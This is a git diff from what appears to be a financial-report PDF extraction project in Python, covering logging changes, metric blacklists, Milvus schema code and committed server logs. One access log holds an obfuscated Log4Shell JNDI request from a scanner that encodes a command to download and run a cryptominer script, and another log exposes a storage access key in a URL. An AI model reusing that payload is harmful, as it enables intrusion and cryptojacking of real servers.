-        # time.sleep(t)
        #阿里接口限流
+        time.sleep(t)
        resp = dashscope.TextEmbedding.call(
            model=dashscope.TextEmbedding.Models.text_embedding_v2,
            input=input)
        if resp.status_code == HTTPStatus.OK:
            return resp
        elif resp.status_code == 429:
-            print(f'触发限流,等待{t}秒后重试')
+            logger.info(f'触发限流,等待{t}秒后重试')
            retry += 1
            t+=0.1
        else:
-            print(f'请求失败,状态码:{resp.status_code}')
+            logger.error(f'请求失败,状态码:{resp.status_code}')
            return None
-    print('重试超过上限')
+    logger.error('重试超过上限')
    return None
#如果存在‘归属于|扣非’,就保留括号内的内容,并去掉标点符号和中文数字。
#如果存在季度关键词,就将括号内容替换为季度
#如果存在‘±’,就将括号内容替换为同期增减
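The reworked embed_with_str now sleeps before every call (time.sleep(t) is active, starting at 0.2s) and lengthens the pause by 0.1s after each HTTP 429, for at most five attempts. The same linear-backoff pattern in isolation (generic sketch, not the project's code):

import time

def call_with_backoff(fn, max_retry=5, t=0.2, step=0.1):
    for _ in range(max_retry):
        time.sleep(t)            # throttle every attempt
        resp = fn()
        if resp.status_code == 200:
            return resp
        if resp.status_code == 429:
            t += step            # throttled: wait longer next time
            continue
        return None              # non-retryable failure
    return None                  # retries exhausted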
@ -89,7 +97,7 @@ def get_clean_text(text):
        return pattern.sub(lambda match: replacements[match.group(0)], text)
    text = replace_all(text, replacement_dict)
    #单独出现12月31日时就剔除掉
-    pattern_year = r'(?<!2023年|2022年|2021年)12月31日'
+    pattern_year = r'(?<!2025年|2024年|2023年|2022年|2021年)12月31日'
    text = re.sub(pattern_year, '', text)
    pattern = r"([^)]*)|\([^)]*\)" # 增加英文括号的匹配
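The widened lookbehind now also shields 2024/2025 dates; every alternative is exactly five characters, which Python's fixed-width lookbehind requires. For example (illustrative):

import re
pattern_year = r'(?<!2025年|2024年|2023年|2022年|2021年)12月31日'
print(re.sub(pattern_year, '', '截至12月31日余额'))    # 裸日期被剔除,得到 '截至余额'
print(re.sub(pattern_year, '', '2024年12月31日余额'))  # 带年份的日期保留,原样输出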
@ -137,11 +145,11 @@ def convert_docx_to_pdf(file_path):
        try:
            # 执行转换
            convert(file_path, pdf_path)
-            print(f"转换成功: {pdf_path}")
+            logger.info(f"转换成功: {pdf_path}")
        except Exception as e:
-            print(f"转换失败: {e}")
+            logger.error(f"转换失败: {e}")
    else:
-        print("错误: 文件必须是 .docx 格式。")
+        logger.error("错误: 文件必须是 .docx 格式。")
def save_pdf_from_url(url, file_path):
    from urllib.parse import unquote
@ -163,10 +171,10 @@ def save_pdf_from_url(url, file_path):
        with open(local_file_path, 'wb') as file:
            file.write(response.content)
-        print(f"文件已下载到 {local_file_path}")
+        logger.info(f"文件已下载到 {local_file_path}")
    else:
        # 文件下载失败
-        print(f"无法下载文件,状态码:{response.status_code}")
+        logger.error(f"无法下载文件,状态码:{response.status_code}")
    return local_file_path
@ -252,7 +260,7 @@ def get_season_flag(text):
        return '0'
def get_percent_flag(text):
-    percent_word = '收益率|占比|比重|比例|同比增减|同比上升|同比下降|变化幅度|同期增减|本年比上年增减|同比变动|变动比例|本年度比上年度增减|增减'
+    percent_word = '收益率|占比|比重|比例|同比增减|同比上升|同比下降|变化幅度|同期增减|本年比上年增减|同比变动|本期期末金额较上期期末变动比例'
    if len(re.findall(percent_word, text)) > 0:
        return '1'
    else:
@ -293,40 +301,7 @@ def check_black_list(meta_measure, pdf_measure, black_array):
def check_black_list_old(meta_measure,pdf_measure):
    # 判断指标名是否包含黑名单词
-    #black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年度公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用','上年年末:1月1日']
+    black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额','营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司','归母净利润:净资产,净利率,扣除,年度公司','扣非净利润:净资产,净利率,年度公司','经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计','筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计','投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计','非经常性损益:扣除非经常性损益','基本每股收益:稀释每股收益','稀释每股收益:基本每股收益','总资产:净资产','应收账款:应付账款','短期借款:长期借款','应付账款:应收账款','长期借款:短期借款','研发投入:比例,比率,占比,费用','资本化研发投入:比例,比率,占比,费用','资本化研发投入占比:金额,费用','研发投入占营业收入比例:金额,费用']
-    black_array = ['非经常性损益:非经常性损益合计,非经常性损益总额,合计'
-        ,'营业收入:营业外收入,主营业务,营业总收入,扣除,年底公司,合计,汇总'
-        ,'归母净利润:净资产,净利率,扣除,年度公司,归属于本公司普通股股东的净利润'
-        ,'扣非净利润:净资产,净利率,年度公司'
-        ,'经营活动现金流净额:筹资活动,投资活动,流入小计,流出小计,每股,扣除'
-        ,'筹资活动现金流净额:经营活动,投资活动,流入小计,流出小计,每股,扣除'
-        ,'投资活动现金流净额:经营活动,筹资活动,流入小计,流出小计,每股,扣除'
-        ,'非经常性损益:扣除非经常性损益'
-        ,'基本每股收益:稀释每股收益,发行新股'
-        ,'稀释每股收益:基本每股收益,发行新股'
-        ,'总资产:净资产','应收账款:应付账款,年以上,内,至,到'
-        ,'短期借款:长期借款,非流动负债,年以上,年以内,内,至,到'
-        ,'应付账款:应收账款,年以上,内,至,到'
-        ,'长期借款:短期借款,非流动负债,年以上,内,至,到,保证,抵押'
-        ,'研发投入:比例,比率,占比,费用,占'
-        ,'资本化研发投入:比例,比率,占比,费用,占'
-        ,'资本化研发投入占比:金额,费用'
-        ,'研发投入占营业收入比例:金额,费用'
-        ,'上年年末:1月1日'
-        ,'期加权平均净资产收益率:同比,扣除,扣非,年化,每股'
-        ,'期扣非加权平均净资产收益率:同比,年化,每股'
-        ,'加权平均净资产收益率同比变动:年化,每股'
-        ,'研发费用:制造,投入,直接,管理'
-        ,'应收账款:1-2年','货币资金:在途'
-        ,'当期:2023年1-6月,调整后'
-        ,'营业成本:营业总成本'
-        ,'长期借债:年内到期','研发投入:直接'
-        ,'第一季度:第二季度,第三季度,第四季度'
-        ,'第二季度:第一季度,第三季度,第四季度'
-        ,'第三季度:第二季度,第一季度,第四季度'
-        ,'第四季度:第二季度,第三季度,第一季度'
-        ,'研发费用:研发支出,研发投入','存货:跌价准备'
-        ,'费用:日常,付现','固定资产:改良,补助,投资']
    # current_period = f'当期:{report_year}年1-6月'
    # black_array.append(current_period)
    for black in black_array:
@ -550,26 +525,26 @@ def check_black_table_list(data):
        black_meta = black.split(':')[0]
        black_pdfs = black.split(':')[1].split(',')
        if any(black_meta in cell for row in data for cell in row):
-            print(data)
+            logger.debug(data)
            for pdf in black_pdfs:
                data = [row for row in data if not any(pdf in cell for cell in row)]
    return data
if __name__ == '__main__':
-    print(len('我是我'))
+    logger.debug(len('我是我'))
-    # print(under_non_alpha_ratio('202水电费水电费水电费是的205月'))
+    # logger.debug(under_non_alpha_ratio('202水电费水电费水电费是的205月'))
    # title = '母公司财务报表主要项目注释'
    # if len(re.findall('母公司|现金流量表补充', title)) >0 and len(re.findall('项目注释', title)) == 0:
-    #     print('1')
+    #     logger.debug('1')
    # else:
-    #     print('0')
+    #     logger.debug('0')
-    # print(check_black_list('当期投资活动现金流净额','当前筹资活动现金流净额'))
+    # logger.debug(check_black_list('当期投资活动现金流净额','当前筹资活动现金流净额'))
    # test = '2023年1-12月'
-    # print(get_period_type('上年度本期费用化研发投入'))
-    # print(get_period_type('费用化研发投入本年度'))
+    # logger.debug(get_period_type('上年度本期费用化研发投入'))
+    # logger.debug(get_period_type('费用化研发投入本年度'))
    # vector_a = embed_with_str('第一季度营业收入')
    # vector = vector_a.output["embeddings"][0]["embedding"]
@ -577,7 +552,7 @@ if __name__ == '__main__':
    # vector1 = vector_b.output["embeddings"][0]["embedding"]
    # similarity = cosine_similarity(vector, vector1)
-    # print(f"余弦相似度: {similarity}")
+    # logger.debug(f"余弦相似度: {similarity}")
    # measure_data = [
    #     '1,1,营业收入2023年金额,1003535799.51',
@ -792,21 +767,14 @@ if __name__ == '__main__':
    # )
    # vector_obj = embed_with_str('2023年营业收入')
    # vector = vector_obj.output["embeddings"][0]["embedding"]
-    # data = [vector]
-    # res = client.search(
-    #     collection_name="zzb_measure", # Replace with the actual name of your collection
-    #     # Replace with your query vector
-    #     data=data,
-    #     limit=1, # Max. number of search results to return
-    #     search_params={"metric_type": "COSINE", "params": {}}, # Search parameters
-    #     output_fields=["measure_name","measure_value"]
-    # )
-    # # Convert the output to a formatted JSON string
-    # result = json.dumps(res, indent=4, ensure_ascii=False)
-    # print(result)
+    # vector_b = embed_with_str('营业收入第一季度')
+    # vector1 = vector_b.output["embeddings"][0]["embedding"]
+    # similarity = cosine_similarity(vector, vector1)
+    # logger.debug(f"余弦相似度: {similarity}")
    # insert_measure_data(client, measure_data)
    # text = '营业收入第一季度(1-3月份)'
    # new_text = re.sub(r'([^)]*)', '',text)
-    # print(new_text)
+    # logger.debug(new_text)

3
zzb_data_prod/wget-log Normal file
View File

@ -0,0 +1,3 @@
--2024-12-27 11:22:17-- https://financial-report.obs.cn-east-3.myhuaweicloud.com/upload/file/44b374ac0fe140a2922c360db47335a1.PDF?AccessKeyId=WMBIZTLULUR24OBUIRC4
Resolving financial-report.obs.cn-east-3.myhuaweicloud.com (financial-report.obs.cn-east-3.myhuaweicloud.com)... failed: Name or service not known.
wget: unable to resolve host address financial-report.obs.cn-east-3.myhuaweicloud.com

View File

View File

@ -0,0 +1,14 @@
<?xml version="1.0" encoding="UTF-8"?>
<module type="PYTHON_MODULE" version="4">
<component name="NewModuleRootManager">
<content url="file://$MODULE_DIR$">
<excludeFolder url="file://$MODULE_DIR$/venv" />
</content>
<orderEntry type="jdk" jdkName="Python 3.8" jdkType="Python SDK" />
<orderEntry type="sourceFolder" forTests="false" />
</component>
<component name="PyDocumentationSettings">
<option name="format" value="PLAIN" />
<option name="myDocStringFormat" value="Plain" />
</component>
</module>

Binary file not shown.

Binary file not shown.

Binary file not shown.

View File

@ -28,42 +28,3 @@ def create_partition_by_hour(current_hour):
        pre_partition.release()
        collection.drop_partition(name)
        print(f"Partition '{name}' deleted.")
from pymilvus import connections, CollectionSchema, Collection,utility,FieldSchema,DataType
# 连接到 B 服务器上的 Milvus
# connections.connect(host='124.70.129.232', port='19530')# 测试服务器
connections.connect(host='127.0.0.1', port='19530')# 测试服务器
# # 获取集合列表
utility.drop_collection("pdf_measure_v4")
# 定义字段
fields = [
FieldSchema(name="id", dtype=DataType.INT64, is_primary=True, auto_id=True),
FieldSchema(name="vector", dtype=DataType.FLOAT_VECTOR, dim=1536),
FieldSchema(name="table_num", dtype=DataType.INT16),
FieldSchema(name="table_index", dtype=DataType.INT16),
FieldSchema(name="measure_name", dtype=DataType.VARCHAR, max_length=200),
FieldSchema(name="measure_value", dtype=DataType.VARCHAR, max_length=200),
FieldSchema(name="file_id", dtype=DataType.VARCHAR, max_length=200),
FieldSchema(name="measure_unit", dtype=DataType.VARCHAR, max_length=200)
]
# 定义集合的 schema
schema = CollectionSchema(fields=fields, description="My Milvus collection")
# 创建集合
collection = Collection(name="pdf_measure_v4", schema=schema)
collection = Collection("pdf_measure_v4")
index_params = {
"index_type": "IVF_FLAT",
"metric_type": "COSINE",
"params": {"nlist": 128}
}
collection.create_index(field_name="vector", index_params=index_params)
collection.load()

5
zzb_data_word/app.log Normal file
View File

@ -0,0 +1,5 @@
nohup: ignoring input
INFO: Started server process [1654611]
INFO: Waiting for application startup.
INFO: Application startup complete.
INFO: Uvicorn running on http://0.0.0.0:8001 (Press CTRL+C to quit)

521
zzb_data_word/app_word.log Normal file
View File

@ -0,0 +1,521 @@
nohup: ignoring input
INFO: Started server process [2255841]
INFO: Waiting for application startup.
INFO: Application startup complete.
INFO: Uvicorn running on http://0.0.0.0:8001 (Press CTRL+C to quit)
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 80.66.83.46:32838 - "CONNECT 80.66.83.46%3A80 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 64.62.197.53:3545 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.197.50:35771 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.197.47:13919 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.197.48:21545 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:57546 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 1.92.159.135:33735 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 1.92.159.135:57283 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 111.7.96.172:12566 - "GET / HTTP/1.1" 404 Not Found
INFO: 123.249.108.188:15282 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:36188 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 95.214.53.211:49760 - "GET / HTTP/1.1" 404 Not Found
INFO: 13.58.97.162:57062 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:49978 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 39.105.14.55:35848 - "GET / HTTP/1.1" 404 Not Found
INFO: 39.105.14.55:35238 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.156.60:32883 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.156.62:35677 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.156.63:36665 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.156.64:2695 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 154.212.141.167:39308 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 185.216.140.186:50780 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
INFO: 206.168.34.197:34136 - "GET / HTTP/1.1" 404 Not Found
INFO: 206.168.34.197:34148 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 123.249.108.188:18897 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 204.188.228.42:37138 - "GET / HTTP/1.1" 404 Not Found
INFO: 87.236.176.70:45919 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 74.82.47.5:59374 - "GET / HTTP/1.1" 404 Not Found
INFO: 74.82.47.5:36568 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 74.82.47.5:22818 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 74.82.47.5:22834 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
INFO: 185.216.140.186:39202 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 113.141.84.160:46762 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 172.206.143.215:52262 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 65.49.20.66:32032 - "GET / HTTP/1.1" 404 Not Found
INFO: 65.49.20.66:11880 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 65.49.20.66:8166 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 65.49.20.66:8170 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
INFO: 125.36.252.182:35210 - "HEAD http%3A//110.242.68.4/ HTTP/1.1" 404 Not Found
INFO: 183.93.85.22:45035 - "GET http%3A//www.wujieliulan.com/ HTTP/1.1" 404 Not Found
INFO: 183.93.85.22:63911 - "CONNECT www.baidu.com%3A443 HTTP/1.1" 404 Not Found
INFO: 183.93.85.22:56321 - "GET http%3A//www.rfa.org/english/ HTTP/1.1" 404 Not Found
INFO: 183.93.85.22:49588 - "CONNECT cn.bing.com%3A443 HTTP/1.1" 404 Not Found
INFO: 183.93.85.22:20626 - "GET http%3A//dongtaiwang.com/ HTTP/1.1" 404 Not Found
INFO: 183.93.85.22:18861 - "CONNECT www.voanews.com%3A443 HTTP/1.1" 404 Not Found
INFO: 121.29.178.42:41815 - "GET http%3A//www.epochtimes.com/ HTTP/1.1" 404 Not Found
INFO: 121.29.178.42:58806 - "CONNECT www.so.com%3A443 HTTP/1.1" 404 Not Found
INFO: 121.29.178.42:22055 - "GET http%3A//www.soso.com/ HTTP/1.1" 404 Not Found
INFO: 121.29.178.42:15541 - "GET http%3A//www.minghui.org/ HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 206.168.34.36:50306 - "GET / HTTP/1.1" 404 Not Found
INFO: 206.168.34.36:50314 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:59964 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 223.113.128.158:50058 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:35796 - "GET / HTTP/1.1" 404 Not Found
INFO: 52.81.237.92:54862 - "GET / HTTP/1.1" 404 Not Found
INFO: 52.81.237.92:54864 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 52.81.237.92:54884 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
INFO: 52.81.237.92:54874 - "GET /robots.txt HTTP/1.1" 404 Not Found
INFO: 162.243.8.38:44506 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 64.62.197.214:16647 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.197.223:22653 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.197.221:26687 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.197.214:2107 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 124.70.63.89:57249 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 124.70.63.89:18564 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 221.3.24.185:64663 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 106.75.189.197:40002 - "POST /token HTTP/1.1" 404 Not Found
INFO: 185.191.126.248:39220 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 113.141.85.252:58036 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 103.203.58.4:47208 - "GET / HTTP/1.1" 404 Not Found
INFO: 2.57.122.207:42128 - "GET / HTTP/1.1" 404 Not Found
INFO: 2.57.122.207:42128 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 162.142.125.37:35894 - "GET / HTTP/1.1" 404 Not Found
INFO: 162.142.125.37:35908 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 206.168.34.121:38726 - "GET / HTTP/1.1" 404 Not Found
INFO: 206.168.34.121:38738 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 206.168.34.42:34776 - "GET / HTTP/1.1" 404 Not Found
INFO: 206.168.34.42:54344 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 87.236.176.211:56241 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 64.62.156.14:6981 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.156.21:38001 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.156.17:47719 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.156.19:24409 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 31.13.224.51:36814 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 120.46.16.109:30384 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 120.46.16.109:16930 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 123.249.108.188:43694 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.191.126.248:56286 - "GET / HTTP/1.1" 404 Not Found
INFO: 184.105.139.70:59608 - "GET / HTTP/1.1" 404 Not Found
INFO: 184.105.139.70:54880 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 184.105.139.70:54884 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 184.105.139.70:65464 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:34390 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.216.140.186:55756 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
INFO: 124.70.90.23:52356 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 36.41.68.61:44290 - "GET / HTTP/1.1" 404 Not Found
INFO: 13.64.193.117:47282 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.216.140.186:59794 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
INFO: 162.142.125.33:47956 - "GET / HTTP/1.1" 404 Not Found
INFO: 162.142.125.33:47972 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 159.65.236.96:54972 - "GET / HTTP/1.1" 404 Not Found
INFO: 123.145.33.216:17362 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 5.135.58.198:44397 - "GET / HTTP/1.1" 404 Not Found
INFO: 178.32.72.218:47617 - "GET /favicon.ico HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 60.191.20.210:43456 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 184.105.247.195:24312 - "GET / HTTP/1.1" 404 Not Found
INFO: 184.105.247.195:18346 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 184.105.247.195:18362 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 184.105.247.195:18378 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
INFO: 80.75.212.9:36590 - "CONNECT api.ip.pn%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:33458 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 185.91.127.9:43792 - "GET /t%28%27%24%7B%24%7Benv%3ANaN%3A-j%7Dndi%24%7Benv%3ANaN%3A-%3A%7D%24%7Benv%3ANaN%3A-l%7Ddap%24%7Benv%3ANaN%3A-%3A%7D//89.34.230.11%3A3306/TomcatBypass/Command/Base64/Y3VybCAtcyAtTCBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vQzNQb29sL3htcmlnX3NldHVwL21hc3Rlci9zZXR1cF9jM3Bvb2xfbWluZXIuc2ggfCBiYXNoIC1zIDQ4Nnhxdzd5c1hkS3c3UmtWelQ1dGRTaUR0RTZzb3hVZFlhR2FHRTFHb2FDZHZCRjdyVmc1b01YTDlwRngzckIxV1VDWnJKdmQ2QUhNRldpcGVZdDVlRk5VeDlwbUdO%7D%27%29 HTTP/1.1" 404 Not Found
INFO: 185.91.127.43:34340 - "CONNECT api.ip.pn%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:47662 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 1.94.195.230:27084 - "HEAD / HTTP/1.1" 404 Not Found
INFO: 1.94.195.230:52315 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.216.140.186:37086 - "GET http%3A//pingjs.qq.com/ping.js HTTP/1.1" 404 Not Found
INFO: 87.236.176.221:52211 - "GET / HTTP/1.1" 404 Not Found
INFO: 206.168.34.206:59698 - "GET / HTTP/1.1" 404 Not Found
INFO: 206.168.34.206:59708 - "PRI %2A HTTP/2.0" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 80.75.212.9:43956 - "CONNECT api.ip.pn%3A443 HTTP/1.1" 404 Not Found
INFO: 64.62.197.80:52199 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.197.81:37671 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.197.89:8367 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.197.81:27717 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 152.32.135.214:45910 - "GET / HTTP/1.1" 404 Not Found
INFO: 152.32.135.214:39902 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 152.32.135.214:39908 - "GET /robots.txt HTTP/1.1" 404 Not Found
INFO: 152.32.135.214:39912 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 185.191.126.248:51164 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 120.46.16.109:25305 - "HEAD /sitemap.xml HTTP/1.1" 404 Not Found
INFO: 120.46.16.109:57264 - "GET /sitemap.xml HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
INFO: 154.212.141.151:56762 - "GET / HTTP/1.1" 404 Not Found
INFO: 185.191.126.248:44644 - "GET / HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 64.62.197.165:56651 - "GET / HTTP/1.1" 404 Not Found
INFO: 64.62.197.152:10483 - "GET /favicon.ico HTTP/1.1" 404 Not Found
INFO: 64.62.197.160:50057 - "GET http%3A//api.ipify.org/?format=json HTTP/1.1" 404 Not Found
INFO: 64.62.197.161:40701 - "CONNECT www.shadowserver.org%3A443 HTTP/1.1" 404 Not Found
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
WARNING: Invalid HTTP request received.
INFO: 138.197.191.87:39360 - "GET / HTTP/1.1" 404 Not Found
ERROR: Exception in ASGI application
Traceback (most recent call last):
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/uvicorn/protocols/http/h11_impl.py", line 407, in run_asgi
result = await app( # type: ignore[func-returns-value]
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/uvicorn/middleware/proxy_headers.py", line 69, in __call__
return await self.app(scope, receive, send)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/fastapi/applications.py", line 1054, in __call__
await super().__call__(scope, receive, send)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/applications.py", line 123, in __call__
await self.middleware_stack(scope, receive, send)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/errors.py", line 186, in __call__
raise exc
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/errors.py", line 164, in __call__
await self.app(scope, receive, _send)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/exceptions.py", line 65, in __call__
await wrap_app_handling_exceptions(self.app, conn)(scope, receive, send)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/_exception_handler.py", line 78, in wrapped_app
await response(scope, receive, sender)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/responses.py", line 152, in __call__
await send(
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/_exception_handler.py", line 50, in sender
await send(message)
File "/root/anaconda3/envs/py310/lib/python3.10/site-packages/starlette/middleware/errors.py", line 161, in _send
await send(message)
